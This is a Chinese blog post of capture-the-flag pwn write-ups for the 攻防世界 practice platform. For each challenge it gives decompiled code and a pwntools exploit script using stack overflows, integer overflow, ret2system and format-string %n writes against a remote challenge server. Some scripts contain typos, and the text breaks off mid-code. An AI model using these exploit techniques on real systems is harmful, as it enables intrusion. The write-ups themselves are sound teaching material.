<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="WP," />





  <link rel="alternate" href="/atom.xml" title="Archerの博客" type="application/atom+xml" />






<meta name="description" content="攻防世界pwn wp">
<meta property="og:type" content="article">
<meta property="og:title" content="攻防世界pwn wp">
<meta property="og:url" content="http://example.com/2021/03/04/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CpwnWP/index.html">
<meta property="og:site_name" content="Archerの博客">
<meta property="og:description" content="攻防世界pwn wp">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="d:/攻防世界/hello_pwn.png">
<meta property="article:published_time" content="2021-03-04T02:02:30.000Z">
<meta property="article:modified_time" content="2021-10-02T12:39:58.863Z">
<meta property="article:author" content="Archer">
<meta property="article:tag" content="WP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="d:/攻防世界/hello_pwn.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>







  <title>攻防世界pwn wp | Archerの博客</title>
  








<meta name="generator" content="Hexo 5.4.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Archerの博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">记录一个菜鸡的成长之路</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-首页">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-关于">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-about"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-标签">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-分类">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-categories"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-归档">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archives"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/03/04/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CpwnWP/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Archerの博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">攻防世界pwn wp</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2021-03-04T10:02:30+08:00">
                2021-03-04
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/WP/" itemprop="url" rel="index">
                    <span itemprop="name">WP</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2021/03/04/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CpwnWP/" class="leancloud_visitors" data-flag-title="攻防世界pwn wp">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">Visitors&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          
              <div class="post-description">
                  攻防世界pwn wp
              </div>
          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="新手区1-level0"><a href="#新手区1-level0" class="headerlink" title="新手区1.level0"></a>新手区1.level0</h3><p>反编译得到的重要的函数</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">callsystem</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">return</span> system(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>和</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">ssize_t</span> <span class="title">vulnerable_function</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> buf; <span class="comment">// [rsp+0h] [rbp-80h]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> read(<span class="number">0</span>, &amp;buf, <span class="number">0x200</span>uLL);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>buf占的空间为0x88<br>后面为<br>-0000000000000004                 db ? ; undefined<br>-0000000000000003                 db ? ; undefined<br>-0000000000000002                 db ? ; undefined<br>-0000000000000001                 db ? ; undefined<br>+0000000000000000  s              db 8 dup(?)<br>+0000000000000008  r              db 8 dup(?)<br>r存放的是返回地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">-0000000000000080 ; Use data definition commands to create local variables <span class="keyword">and</span> function arguments.</span><br><span class="line">-0000000000000080 ; Two special fields <span class="string">&quot; r&quot;</span> <span class="keyword">and</span> <span class="string">&quot; s&quot;</span> represent <span class="keyword">return</span> address <span class="keyword">and</span> saved registers.</span><br></pre></td></tr></table></figure>
<p>将r覆盖为callsystem即能进入system(“bin/sh”)<br>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&quot;111.200.241.244&quot;</span>,<span class="number">34767</span>)</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x88</span>+p64(<span class="number">0x400596</span>)//sysaddr = elf.symbols[<span class="string">&#x27;callsystem&#x27;</span>] <span class="comment"># 获取 ELF 文件中 callsystem 的地址</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.ineractive()</span><br></pre></td></tr></table></figure>

<h3 id="新手区第2题hello-pwn-栈溢出"><a href="#新手区第2题hello-pwn-栈溢出" class="headerlink" title="新手区第2题hello pwn(栈溢出)"></a>新手区第2题hello pwn(栈溢出)</h3><p>反编译代码如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">main</span><span class="params">(__int64 a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  alarm(<span class="number">0x3C</span>u);</span><br><span class="line">  setbuf(<span class="built_in">stdout</span>, <span class="number">0LL</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;~~ welcome to ctf ~~     &quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;lets get helloworld for bof&quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>, &amp;unk_601068, <span class="number">0x10</span>uLL);</span><br><span class="line">  <span class="keyword">if</span> ( dword_60106C == <span class="number">0x6E756161</span> )</span><br><span class="line">    sub_400686(<span class="number">0LL</span>, &amp;unk_601068);--cat flag</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>dword_601068C的位置如图<br><img src="D:\攻防世界\hello_pwn.png" alt="avatar"><br>得到flag必须是dword值为0x6E756161，payload=b’a’* 4+p32(0x6E756161)<br>exp为</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&quot;111.200.241.244:36548&quot;</span>,<span class="number">36548</span>)</span><br><span class="line">p=<span class="string">b&#x27;a&#x27;</span>*<span class="number">4</span>+p32(<span class="number">0x6E756161</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"><span class="built_in">print</span>(p.recv())</span><br><span class="line"><span class="built_in">print</span>(p.recv())</span><br></pre></td></tr></table></figure>

<h3 id="第3题int-overflow-整数溢出-栈溢出"><a href="#第3题int-overflow-整数溢出-栈溢出" class="headerlink" title="第3题int_overflow(整数溢出+栈溢出)"></a>第3题int_overflow(整数溢出+栈溢出)</h3><p>cat flag地址为0x0804868</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">.text:0804868B ; __unwind &#123;</span><br><span class="line">.text:0804868B                 push    ebp</span><br><span class="line">.text:0804868C                 mov     ebp, esp</span><br><span class="line">.text:0804868E                 sub     esp, <span class="number">8</span></span><br><span class="line">.text:08048691                 sub     esp, 0Ch</span><br><span class="line">.text:08048694                 push    offset command  ; <span class="string">&quot;cat flag&quot;</span></span><br><span class="line">.text:08048699                 call    _system</span><br><span class="line">.text:0804869E                 add     esp, 10h</span><br><span class="line">.text:080486A1                 nop</span><br><span class="line">.text:080486A2                 leave</span><br><span class="line">.text:080486A3                 retn</span><br><span class="line">.text:080486A3 ; &#125; // starts at 804868B</span><br></pre></td></tr></table></figure>
<p>通过分析源程序可以知道溢出点在dest 在strcpy中将s复制到dest中，s位函数传进来的参数w，最多为0x199位远远大于0x14的dest，但是if函数中只有当s的长度为4，5，6，7时才能实现strcpy操作，从而栈溢出，即passwd的长度为4-7，此时通过整数溢出则能实现控制passwd的长度符合条件，v3为passwd的长度为8位,最大为255，exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&quot;111.200.241.244&quot;</span>,<span class="number">54103</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;Your choice:&quot;</span>,<span class="string">&quot;1&quot;</span>)</span><br><span class="line">p.sendineafter(<span class="string">&quot;username:&quot;</span>,<span class="string">&#x27;archer&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;Please input your passwd:&quot;</span>)</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x14</span>+<span class="string">b&#x27;a&#x27;</span>*<span class="number">4</span>+p32(<span class="number">0x804868B</span>)+<span class="string">b&#x27;a&#x27;</span>*<span class="number">234</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recv()</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="第4题when-did-you-born-栈溢出"><a href="#第4题when-did-you-born-栈溢出" class="headerlink" title="第4题when_did_you_born(栈溢出)"></a>第4题when_did_you_born(栈溢出)</h3><p>溢出点:gets()<br>题目源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( v5 == <span class="number">0x786</span> )</span><br><span class="line">&#123;</span><br><span class="line">  puts(<span class="string">&quot;You Cannot Born In 1926!&quot;</span>);</span><br><span class="line">  result = 0LL;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">  puts(<span class="string">&quot;What&#x27;s Your Name?&quot;</span>);</span><br><span class="line">  gets((__int64)&amp;v4);</span><br><span class="line">  printf(<span class="string">&quot;You Are Born In %d\n&quot;</span>, v5);</span><br><span class="line">  <span class="keyword">if</span> ( v5 == <span class="number">0x786</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    puts(<span class="string">&quot;You Shall Have Flag.&quot;</span>);</span><br><span class="line">    system(<span class="string">&quot;cat flag&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>拿到flag必须使v5进入第一个if时!=0x786而进入第二个if时=0x786,后面发现有gets函数，通过简单的覆盖操作即能拿到flag<br>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span>  pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&quot;111.200.241.244&quot;</span>,<span class="number">59458</span>)</span><br><span class="line">p.sendline(<span class="string">&quot;1111&quot;</span>)</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x20</span>-<span class="number">0x18</span>)+p64(<span class="number">0x786</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;What&#x27;s Your Name?&quot;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"><span class="built_in">print</span>(p.recv())</span><br><span class="line"><span class="built_in">print</span>(p.recv())</span><br><span class="line"><span class="built_in">print</span>(p.recv())</span><br></pre></td></tr></table></figure>

<h3 id="第5题CGfsb-格式化字符串漏洞"><a href="#第5题CGfsb-格式化字符串漏洞" class="headerlink" title="第5题CGfsb(格式化字符串漏洞)"></a>第5题CGfsb(格式化字符串漏洞)</h3><p>首先阅读程序的源代码如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> buf; <span class="comment">// [esp+1Eh] [ebp-7Eh]</span></span><br><span class="line">  <span class="keyword">int</span> v5; <span class="comment">// [esp+22h] [ebp-7Ah]</span></span><br><span class="line">  __int16 v6; <span class="comment">// [esp+26h] [ebp-76h]</span></span><br><span class="line">  <span class="keyword">char</span> s; <span class="comment">// [esp+28h] [ebp-74h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v8; <span class="comment">// [esp+8Ch] [ebp-10h]</span></span><br><span class="line"></span><br><span class="line">  v8 = __readgsdword(<span class="number">0x14</span>u);</span><br><span class="line">  setbuf(<span class="built_in">stdin</span>, <span class="number">0</span>);</span><br><span class="line">  setbuf(<span class="built_in">stdout</span>, <span class="number">0</span>);</span><br><span class="line">  setbuf(<span class="built_in">stderr</span>, <span class="number">0</span>);</span><br><span class="line">  buf = <span class="number">0</span>;</span><br><span class="line">  v5 = <span class="number">0</span>;</span><br><span class="line">  v6 = <span class="number">0</span>;</span><br><span class="line">  <span class="built_in">memset</span>(&amp;s, <span class="number">0</span>, <span class="number">0x64</span>u);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;please tell me your name:&quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>, &amp;buf, <span class="number">0xA</span>u);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;leave your message please:&quot;</span>);</span><br><span class="line">  fgets(&amp;s, <span class="number">100</span>, <span class="built_in">stdin</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;hello %s&quot;</span>, (<span class="keyword">const</span> <span class="keyword">char</span> *)&amp;buf);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;your message is:&quot;</span>);</span><br><span class="line">  <span class="built_in">printf</span>(&amp;s);</span><br><span class="line">  <span class="keyword">if</span> ( pwnme == <span class="number">8</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;you pwned me, here is your flag:\n&quot;</span>);</span><br><span class="line">    system(<span class="string">&quot;cat flag&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Thank you!&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>使pwnme为8即能拿到flag，此时可以发现前面的printf(&amp;s)存在格式化字符串漏洞()，%?$n(?为溢出位数,作用将之前输出的字符串的长度赋给一个变量，栈中第一个位置即为变量的地址),溢出位数可以通过输入aaaa+%p* 20得知<br>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&quot;111.200.241.244&quot;</span>,<span class="number">35314</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;please tell me your name:&quot;</span>,<span class="string">&quot;archer&quot;</span>)</span><br><span class="line">payload=p32(<span class="number">0x0804A068</span>)+<span class="string">&#x27;aaaa&#x27;</span>+<span class="string">&#x27;%10$n&#x27;</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line"><span class="built_in">print</span>(p.recv())</span><br><span class="line"><span class="built_in">print</span>(p.recv())</span><br></pre></td></tr></table></figure>

<h3 id="第6题level2"><a href="#第6题level2" class="headerlink" title="第6题level2"></a>第6题level2</h3><p>题目源代码如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">ssize_t</span> <span class="title">vulnerable_function</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> buf; <span class="comment">// [esp+0h] [ebp-88h]</span></span><br><span class="line"></span><br><span class="line">  system(<span class="string">&quot;echo Input:&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> read(<span class="number">0</span>, &amp;buf, <span class="number">0x100</span>u);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>显然buf为溢出点<br>此时查看栈结构如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">+00000000  s              db 4 dup(?)</span><br><span class="line">+00000004  r              db 4 dup(?)</span><br><span class="line">+00000008</span><br><span class="line">+00000008 ; end of stack variables</span><br></pre></td></tr></table></figure>
<p>输入0x8C填满前面的部分之后填入_system()函数的返回地址0x08048320，然后还要把剩下的空间填满(ebp+8),进入_system()后，需要将/bin/sh(地址为0x0804A024)替换为system中的参数<br>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&quot;111.200.241.244&quot;</span>,<span class="number">59477</span>)</span><br><span class="line">systemaddr=<span class="number">0x08048320</span></span><br><span class="line">binaddr=<span class="number">0x0804A024</span></span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x88</span>+p32(systemaddr)+p32(binaddr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"><span class="built_in">print</span>(p.recv())</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="第7题string"><a href="#第7题string" class="headerlink" title="第7题string"></a>第7题string</h3><p>在代码中存printf(&amp;format,&amp;format)这个操作(格式化字符串漏洞)，而这个操作能够实现什么–修改指定内存的数据</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 <span class="title">sub_400BB9</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> v1; <span class="comment">// [rsp+4h] [rbp-7Ch]</span></span><br><span class="line">  __int64 v2; <span class="comment">// [rsp+8h] [rbp-78h]</span></span><br><span class="line">  <span class="keyword">char</span> format; <span class="comment">// [rsp+10h] [rbp-70h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v4; <span class="comment">// [rsp+78h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v4 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  v2 = <span class="number">0LL</span>;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;You travel a short distance east.That&#x27;s odd, anyone disappear suddenly&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;, what happend?! You just travel , and find another hole&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;You recall, a big black hole will suckk you into it! Know what should you do?&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;go into there(1), or leave(0)?:&quot;</span>);</span><br><span class="line">  _isoc99_scanf((__int64)<span class="string">&quot;%d&quot;</span>, (__int64)&amp;v1);</span><br><span class="line">  <span class="keyword">if</span> ( v1 == <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;A voice heard in your mind&quot;</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;&#x27;Give me an address&#x27;&quot;</span>);</span><br><span class="line">    _isoc99_scanf((__int64)<span class="string">&quot;%ld&quot;</span>, (__int64)&amp;v2);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;And, you wish is:&quot;</span>);</span><br><span class="line">    _isoc99_scanf((__int64)<span class="string">&quot;%s&quot;</span>, (__int64)&amp;format);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Your wish is&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(&amp;format, &amp;format);<span class="comment">//就是这里</span></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;I hear it, I hear it....&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v4;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>通过对程序的分析可以知道，程序内没有给出system相关的函数，因此需要自己构建一个函数有多种方式构造<br>其一(pwntools中的)<br>context(arch=’amd64’,os=’linux’,log_level=’debug’)<br>shellcode=asm(shellcraft.sh())<br>但是shellcode应该放在哪一段区域，使shellcode被执行呢?现在根据程序从后往前推<br>另一段代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 __fastcall <span class="title">sub_400CA6</span><span class="params">(_DWORD *a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">void</span> *v1; <span class="comment">// rsi</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v3; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v3 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Ahu!!!!!!!!!!!!!!!!A Dragon has appeared!!&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Dragon say: HaHa! you were supposed to have a normal&quot;</span>);</span><br><span 